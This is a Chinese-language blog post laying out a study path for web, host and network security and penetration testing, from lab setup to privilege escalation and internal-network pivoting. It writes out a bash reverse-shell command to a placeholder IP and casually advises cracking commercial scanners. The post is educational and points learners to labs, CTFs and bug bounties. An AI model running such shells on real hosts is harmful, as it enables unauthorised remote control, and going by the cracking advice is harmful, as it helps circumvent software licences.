网络安全系统安全web安全学习思路

本篇文章不涉及广告推广，存粹自己总结。

网络安全系统安全和web安全的区别是什么？

网络安全指在计算机在联网状态下使用网络传输交互时的安全（一般来说包括操作系统和web），系统安全一般指操作系统的安全（Linux Windows主机安全），web安全就是网站安全（包括中间件，前后端，数据库）。

也就是安全被分为两大类，web安全和主机安全，其中web安全占比非常大，主机安全占比较小。

但不论是web安全还是主机安全，最终目的都是拿到主机权限，只是早期时，目标以操作系统软件居多，这可以直接拿最高账户权限，但是在发展过程中防火墙技术改变了格局，攻击者的目光也渐渐的转移到了web服务上面。

当前网络安全现状

当前网络安全经过多年的沉淀，已经集成了很多套工具预防攻击了，只是工具只能防御常见攻击手段，逻辑漏洞基本防不了，你所学的也许都会被防火墙拦截，你可以寻找绕过方法，只是这个太难而阻断了大多数人对这行业的兴趣

现在从事红队的人员比较少，因为红队的渗透测试服务对于企业来说并不赚钱，真正赚钱的是防御设备，并不是服务，也就是蓝队这边所做的防御产品，网络安全公司人员基本大多数时间在搞防御设备的建设运营，堡垒机，探针，蜜罐，防火墙，杀软，告警分析等，因为他们想让客户认识到自己的防御设备，出售自身产品，才能带来利润，据听说就一个设备的价格是100W，而红队最常出现在HW阶段，仅仅是做测试服务，红队很少有产品可以出售。

网络安全从哪里开始学习呢？

建议先从web安全学起

之后走主机安全（如何拿下一个linux，windows主机）

最后是代码审计和hack编程。

网络安全学习路线

vmware虚拟机，建议安装centos作web服务器，windows7作靶机，kali做攻击机

vm虚拟机最重要的要搞懂vmnet0（网桥），vmnet1（仅主机），vmnet8（NAT）的区别

学习linux常用命令，开机引导过程，一切皆文件思想，压缩解压，vim的使用，nc命令（就是网络socket监听与连接），shell概念，重定向，账号权限，软件安装与升级，内核中文件描述符的概念（本质是c语言结构体），/etc/passwd和/etc/shadow文件

有一句命令叫反弹shell命令：bash -i >& /dev/tcp/192.168.1.10/端口号 0>&1，这里面用到的知识点有bash参数，重定向，/dev/tcp目录的作用，socket连接原理，文件描述符

最后可以选择性学习一下docker，常用来搭建靶场

计算机网络

包括网络分类，通信协议，OSI参考模型，IP地址，路由（一般学路由概念，路由表），TCP/IP协议栈，端口与服务（一个端口对应一个服务，关闭了服务也就关闭了对应的端口）

loT协议Industrial Control协议VoIP协议VPN/Security协议Microsoft协议IBM协议基本全被淘汰，只留下了TCP/IP协议和OSI参考模型，所以网络中TCP/IP协议很重要，TCP状态转换图很重要

常见服务

FTP，Telnet，ssh，DNS，DHCP，SMTP，SNMP等等，要学会这些服务含义，以及历史上出现的重大漏洞，以及可能存在什么漏洞，能进行复现最好

最后重要的是能够自己搭建出一个网站，靶场中最常见的网站架构是linux+apache+php+mysql，要搞清其中的关系，修改apache配置让网站支持php，修改php配置让网站支持mysql

中间件：apache，nginx，tomcat，iis 搞清他们的区别都是什么，nginx的反向代理功能是最重要的

扫描器和工具

nmap（端口扫描器）直接nmap -h命令就可以查看对应帮助常用参数有，-Pn，-p，-A，-T，-v，-O，-sn，导出报告，NSE脚本扫描

nessus（主机漏洞扫描器）这个软件破解方式非常麻烦，破解两天都是很正常的，学会使用扫描器扫描主机，导出报告即可，漏洞验证可以搜索报告中的CVE号或关键字进行验证

appscan（web扫描器）此软件是IBM开发的，误报率比较高，通常在windows主机上安装使用

awvs（web扫描器的神器）需要安装破解，最常用的web漏洞扫描工具，扫描结果数量较多较准确，含有爬虫功能

xray（长亭科技开发的web扫描器）使用方式是命令行，扫描出的结果数量中等，配合burpsuite做登录扫描最好用。也可以配合其他工具以爬虫方式扫描，爬的越多扫的越多，rad，awvs

burpsuite 安全人员必备抓包神器，拦截数据包改包，重放，web弱口令爆破，扫描插件还可以做web漏洞扫描

编程基础

html，javascript 这两个能看懂基本语法即可

java 要求能理解web前后端交互执行原理，mvc架构

python 最常用的是爬虫模块，最常用来编写辅助工具使用

数据库（mysql，mssql，oracle，redis）要学习基本sql语句语法，union查询，学习sql注入的前提条件

后端语言：php，java，python

后端框架：thinkphp，spring，Django

渗透测试基础

HTTP协议 请求方法，get post put trace 响应状态码

URL和URI

网站从域名-》ip-》服务器-》前端-》后端-》数据库执行原理

肉鸡，木马，挂马，后门，端口，crack，poc，exp，vul，cve，0day概念

渗透测试定义流程，类型（黑盒白盒灰盒）

内网渗透和外网渗透概念

信息搜集渗透测试头等重要的一环，也有可能到快结束了仍然在做信息搜集，方法有google，zoomeye，Shodan，goby，whois查询，DNS，社工，描绘出目标系统的网络结构，如公司网络所在区域，子公司IP地址分布，VPN接入地址等，端口服务，目录扫描（wwwscan）

流程大致可分为：

信息搜集-》漏洞发现-》漏洞利用-》提权-》内网渗透-》痕迹清除-》输出报告

owasp10 是一个组织，最重要的项目之一是“Web 应用的十大安全隐患”

常见漏洞复现

这时候你需要一些靶场，就像上战场的军人一样，要做真实训练

sql注入，可以使用sqlilabs靶场

XSS，可以使用xsslabs靶场（xss三种类型反射型，dom型，存储型）此漏洞一般配合csrf漏洞进行利用

文件上传，可以使用uploadlabs靶场

apache和nginx解析漏洞，找低版本的复现

csrf概念理解，会复现即可

ssrf概念理解，尽量能复现

代码注入 理解原理，能做复现

越权 此类漏洞在很多大型网站均可能存在，扫描器也扫描不到，一般是手工挖掘

信息泄露 源代码泄露，报错中间件版本泄露等

文件包含 理解原理，要会使用远程文件包含，本地文件包含

命令执行，非常危险的漏洞，可以远程执行任意命令控制服务器

任意文件读取，目录遍历 理解原理，如何读取/etc/passwd文件

java反序列化

XML外部实体注入（XXE漏洞）

GNU Bash代码执行

Open SSL心脏出血漏洞

Centreon v19.04远程代码执行

Wordpress 4.6 任意命令执行（CVE-2016-10033）

远程桌面代码执行漏洞（CVE-2019-0708）

永恒之蓝漏洞（MS17-010）

Apache Shiro RememberMe 1.2.4 反序列化漏洞

fastjson1.2.47反序列化漏洞

Struts2 S2-061 远程命令执行

综合靶场：DVWA，metasploitable2，webbug，pikachu

工具类

metasploit 渗透测试漏洞利用神器，集成很多常用模块

cobaltstrike 内网渗透神器，以服务端和客户端的方式运行，常用于组织作战，现在很少单兵作战了

hydra 在线暴力破解工具，支持五十多种协议，ssh，ftp，rlogin，postgresql系统安全，vnc等

fority 代码审计工具

逻辑漏洞挖掘

此漏洞工具扫不出来，必须手工寻找

弱口令，暴力破解，验证码问题（前端可读，前端可控，前端验证，可重复使用，业务数据和验证码分别提交，验证码不生效，验证码未绑定用户），任意用户名密码修改，重置凭证未校验，越权，数据遍历，订单金额修改，本地验证绕过，修改接收手机或邮箱

提权

直接提权，Windows本地溢出提权，Radmin提权，VNC提权，pcAnyWhere提权，Serv-U提权，UDF提权，MOF提权，xp_cmdshell执行命令提权，sp_oamethod和wscript.shell执行命令提权，access的沙盒模式执行命令提权，xp_makecab和xp_unpackcab创建后门提权，sp_oamethod和FSO创建SHIFT后门提权，xp_regwrite进行映像劫持提权，FileZilla Server提权，内网端口转发，本地溢出提权，脏牛漏洞提权，Linux sudo root权限绕过漏洞，Linux 本地提权(CVE-2019-13272)，Windows本地提权漏洞（CVE-2018-8120）

内网渗透

隧道技术介绍、bash反弹shell

curl反弹shell

python反弹shell

ssh正向/反向代理

ssh-socker5代理

GPP攻击利用

WEB渗透实战

MS14-068攻击技术

烂土豆提权

密码喷洒攻击

Cobalt Strike流量加密

内网渗透实战

渗透测试整理

信息搜集-》漏洞扫描-》手工挖掘-》漏洞验证-》编写报告-》提出修复建议

重点在于接口测试和逻辑漏洞，这一点扫描器扫不到，防火墙也难防

渗透测试不能只看病不开药

基本到这里你可以有基本的工作技能，可以尝试打CTF，去src众测网站挖掘漏洞，挖的漏洞越是高危，赏金越多

做完以上这些，找个工作是没问题的，如果往高级进阶可以做代码审计和hack编程。

（编辑：成都站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!